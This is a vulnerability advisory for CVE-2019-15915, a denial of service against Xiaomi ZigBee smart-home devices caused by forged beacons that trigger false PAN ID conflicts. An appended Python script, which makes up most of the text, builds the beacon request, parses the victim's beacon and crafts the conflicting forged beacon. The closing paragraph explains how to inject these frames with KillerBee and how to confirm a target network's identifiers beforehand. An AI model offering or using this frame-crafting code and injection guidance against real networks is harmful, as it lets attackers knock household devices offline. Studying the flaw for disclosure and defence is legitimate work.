CVE-2019-15915
Insecure discover ZigBee network procedure
Discoverer
Huang, Yang-Cheng, Lin, Hsuan-Yu, Telecom Technology Center
Description
An issue was discovered on Xiaomi DGNWG03LM, ZNCZ03LM, MCCGQ01LM, RTCGQ01LM devices. Attackers can utilize the "discover ZigBee network procedure" to perform a denial of service attack.
Xiaomi smart home devices attack demonstration
1. System architecture
The system architecture of this attack demonstration, as shown in Figure 1, is divided into an attacker side and a victim side.
Attacker:
- Laptop (Ubuntu 16.04.3 LTS)
- Atmel RZ Raven USB sticks (2.4 GHz IEEE 802.15.4 dongles)
- KillerBee (this research mainly modifies the KillerBee API)
- ZigDiggity
- Wireshark
Victim:
In the victim environment the gateway acts as the ZigBee coordinator: it provides Internet access, establishes the ZigBee network, and connects the router and the end devices. Users read the state of the end devices and router, and control them, through smart devices (e.g. a smart phone). The victim devices in this demonstration are Xiaomi smart home devices of the following models:
- Gateway acting as ZigBee coordinator: DGNWG03LM
- Router: ZNCZ03LM
- End device: MCCGQ01LM
- End device: RTCGQ01LM
2. Denial of Service Attack - Insecure discover ZigBee network procedure
The attacker broadcasts a Beacon Request packet (an IEEE 802.15.4 MAC command that carries no authentication) and waits for the victim coordinator to answer with a Beacon packet. The beacon reveals the current personal area network identifier (PAN ID) of the ZigBee network in its MAC header and the extended personal area network identifier (EPID) in its ZigBee beacon payload, as shown in Figure 2.
The attacker then sends fake Beacon packets that carry the same PAN ID as the current ZigBee network but a different EPID. Per the ZigBee specification, a device that hears a beacon with its own PAN ID but a different EPID treats it as a PAN ID conflict and starts the conflict-resolution procedure, so the network is forced to deal with a conflict that does not exist. Beacons are never encrypted or authenticated in IEEE 802.15.4, so the coordinator cannot tell the forged beacon from a legitimate one. As a result, user control of the ZNCZ03LM becomes slow or unresponsive. If the attacker uses multiple attack devices, this can escalate to a denial of service, and after a period of attack the other smart home devices also stop responding, as shown in Figure 3 and Figure 4.
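As an added example that is not part of this advisory or of the discoverers' modified KillerBee code, the following Python builds and parses the three frames of the procedure offline: the Beacon Request, the coordinator's beacon (PAN ID in the MAC header, EPID in the ZigBee beacon payload), and the forged beacon that reuses the PAN ID with a different EPID. It also implements the conflict rule a ZigBee device applies to beacons it hears. The PAN ID, coordinator address and EPIDs are constructed sample values, not ones captured from the Xiaomi devices, and nothing is transmitted.

```python
"""
IEEE 802.15.4 / ZigBee beacon handling for the PAN ID conflict attack.
Added example; all frame contents below are constructed, not captured.
"""
import struct
from dataclasses import dataclass

BEACON_REQUEST_CMD = 0x07        # IEEE 802.15.4 MAC command id: Beacon Request
FCF_BEACON_REQUEST = 0x0803      # type=command(3), dst addr mode=short, src addr mode=none
FCF_BEACON = 0x8000              # type=beacon(0), dst addr mode=none, src addr mode=short
ZIGBEE_BEACON_PAYLOAD_LEN = 15   # ZigBee NWK beacon payload: protocol id .. nwkUpdateId


def crc16_kermit(data: bytes) -> int:
    """IEEE 802.15.4 FCS: CRC-16, polynomial x^16+x^12+x^5+1, bit-reflected, init 0."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc


def with_fcs(body: bytes) -> bytes:
    """Append the little-endian FCS, as it appears on the air."""
    return body + struct.pack("<H", crc16_kermit(body))


def build_beacon_request(seq: int) -> bytes:
    """Step 1: Beacon Request broadcast to PAN 0xFFFF / address 0xFFFF. No security field exists."""
    return with_fcs(struct.pack("<HBHHB", FCF_BEACON_REQUEST, seq & 0xFF, 0xFFFF, 0xFFFF, BEACON_REQUEST_CMD))


@dataclass
class BeaconInfo:
    pan_id: int
    coordinator_addr: int
    extended_pan_id: int
    nwk_update_id: int
    association_permit: bool


def parse_beacon(frame: bytes) -> BeaconInfo:
    """Step 2: pull PAN ID (MAC header) and EPID (ZigBee payload) out of a coordinator beacon."""
    body, fcs = frame[:-2], struct.unpack("<H", frame[-2:])[0]
    if crc16_kermit(body) != fcs:
        raise ValueError("bad FCS")
    fcf, _seq, pan_id, src_addr, superframe = struct.unpack_from("<HBHHH", body, 0)
    if (fcf & 0x7) != 0 or ((fcf >> 14) & 0x3) != 2:
        raise ValueError("not a beacon with a short source address")
    off = 9
    gts_spec = body[off]
    off += 1
    if gts_spec & 0x7:                      # GTS directions byte + 3-byte descriptors
        off += 1 + 3 * (gts_spec & 0x7)
    pend_spec = body[off]                   # pending short (bits 0-2) / extended (bits 4-6) addresses
    off += 1 + 2 * (pend_spec & 0x7) + 8 * ((pend_spec >> 4) & 0x7)
    payload = body[off:]
    if len(payload) < ZIGBEE_BEACON_PAYLOAD_LEN or payload[0] != 0x00:
        raise ValueError("no ZigBee NWK beacon payload")
    epid = struct.unpack_from("<Q", payload, 3)[0]   # payload bytes 3..10
    return BeaconInfo(pan_id, src_addr, epid, payload[14], bool(superframe & 0x8000))


def build_beacon(seq, pan_id, coord_addr, extended_pan_id, nwk_update_id=0, assoc_permit=True):
    """Coordinator-style beacon: no GTS, no pending addresses, ZigBee PRO (profile 2) payload."""
    superframe = 0x4FFF | (0x8000 if assoc_permit else 0)   # BO=SO=15, PAN coordinator bit set
    header = struct.pack("<HBHHHBB", FCF_BEACON, seq & 0xFF, pan_id, coord_addr, superframe, 0, 0)
    # protocol id 0, stack profile 2 / nwk version 2, router+end-device capacity at depth 0,
    # EPID, TxOffset 0xFFFFFF, nwkUpdateId
    payload = struct.pack("<BBBQ3sB", 0x00, 0x22, 0x84, extended_pan_id, b"\xff\xff\xff", nwk_update_id)
    return with_fcs(header + payload)


def craft_conflicting_beacon(observed: BeaconInfo, seq: int, fake_epid: int) -> bytes:
    """Step 3: same PAN ID, different EPID, which the ZigBee NWK layer treats as a PAN ID conflict."""
    if fake_epid == observed.extended_pan_id:
        raise ValueError("the forged EPID must differ from the network's EPID")
    return build_beacon(seq, observed.pan_id, observed.coordinator_addr, fake_epid, observed.nwk_update_id)


def is_pan_id_conflict(own: BeaconInfo, heard: BeaconInfo) -> bool:
    """The rule a ZigBee device applies to every beacon it hears from another network."""
    return heard.pan_id == own.pan_id and heard.extended_pan_id != own.extended_pan_id


def demo():
    """Constructed sample exchange: the victim beacon is built here, not captured from a DGNWG03LM."""
    victim_beacon = build_beacon(seq=0x2A, pan_id=0x1A62, coord_addr=0x0000,
                                 extended_pan_id=0x00124B0011223344)
    victim = parse_beacon(victim_beacon)
    forged = craft_conflicting_beacon(victim, seq=0x01, fake_epid=0xDEADBEEFCAFEF00D)
    heard = parse_beacon(forged)
    return build_beacon_request(0x10), victim, heard, is_pan_id_conflict(victim, heard)


if __name__ == "__main__":
    req, victim, heard, conflict = demo()
    print("beacon request :", req.hex())
    print("victim         : PAN ID", hex(victim.pan_id), "EPID", hex(victim.extended_pan_id))
    print("forged beacon  : PAN ID", hex(heard.pan_id), "EPID", hex(heard.extended_pan_id))
    print("conflict seen  :", conflict)
```

To actually put these frames on the air you would hand them to an injection tool such as KillerBee on a 2.4 GHz dongle; whether the trailing two FCS bytes must be included or stripped depends on the dongle firmware, so check the tool's documentation before injecting. The same parser can be run over beacons captured in Wireshark to confirm the PAN ID and EPID of the target network before the forged beacon is sent.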